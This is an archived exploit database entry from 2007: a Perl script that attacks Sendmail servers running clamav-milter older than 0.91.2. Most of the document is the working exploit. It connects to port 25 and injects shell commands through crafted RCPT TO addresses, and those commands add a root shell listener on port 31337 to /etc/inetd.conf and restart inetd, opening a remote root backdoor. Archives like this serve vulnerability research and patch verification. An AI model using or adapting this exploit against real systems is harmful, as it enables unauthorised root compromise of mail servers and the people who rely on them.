Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit

2007-12-21T00:00:00
ID EDB-ID:4761
Type exploitdb
Reporter eliteboy
Modified 2007-12-21T00:00:00

Description

Sendmail with clamav-milter < 0.91.2 Remote Root Exploit. Remote exploits for multiple platform

                                        
                                            ### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
########################################################
use IO::Socket;

print "Sendmail w/ clamav-milter Remote Root Exploit\n";
print "Copyright (C) 2007 Eliteboy\n";

if ($#ARGV != 0) {print "Give me a host to connect.\n";exit;}

print "Attacking $ARGV[0]...\n";

$sock = IO::Socket::INET-&gt;new(PeerAddr =&gt; $ARGV[0],
                              PeerPort =&gt; '25',
                              Proto    =&gt; 'tcp');

print $sock "ehlo you\r\n";
print $sock "mail from: &lt;&gt;\r\n";
print $sock "rcpt to: &lt;nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' &gt;&gt; /etc/inetd.conf\"@localhost&gt;\r\n";
print $sock "rcpt to: &lt;nobody+\"|/etc/init.d/inetd restart\"@localhost&gt;\r\n";
print $sock "data\r\n.\r\nquit\r\n";

while (&lt;$sock&gt;) {
        print;
}

# milw0rm.com [2007-12-21]